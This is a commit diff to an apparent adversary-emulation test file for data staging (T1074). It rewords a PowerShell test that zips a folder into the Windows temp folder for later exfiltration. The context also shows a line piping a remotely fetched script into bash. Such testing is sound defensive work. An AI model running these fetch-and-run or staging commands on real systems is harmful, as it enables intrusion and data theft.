Updated atomic test 3 for better alignment with T1074 (Staging) (#763)
Test was written previously for T1022 and then moved here; T1022 already has very similar tests, but it is useful here so just reworded test 3.
This commit is contained in:
JB
@@ -29,15 +29,15 @@ atomic_tests:
|
||||
command: |
|
||||
curl -s https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.sh | bash -s > /tmp/discovery.log
|
||||
|
||||
- name: Zip a Folder with PowerShell
|
||||
- name: Zip a Folder with PowerShell for Staging in Temp
|
||||
description: |
|
||||
use living off the land tools to encrypt and zip a file for exfiltration
|
||||
Use living off the land tools to zip a file and stage it in the Windows temporary folder for later exfiltration.
|
||||
supported_platforms:
|
||||
- windows
|
||||
executor:
|
||||
name: powershell
|
||||
elevation_required: false
|
||||
command: |
|
||||
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_encrypt -DestinationPath $env:TEMP\Folder_to_encrypt.zip
|
||||
Compress-Archive -Path $PathToAtomicsFolder\T1074\bin\Folder_to_zip -DestinationPath $env:TEMP\Folder_to_zip.zip
|
||||
cleanup_command: |
|
||||
Remove-Item -Path $env:TEMP\Folder_to_encrypt.zip
|
||||
Remove-Item -Path $env:TEMP\Folder_to_zip.zip
|
||||
|
||||
Reference in New Issue
Block a user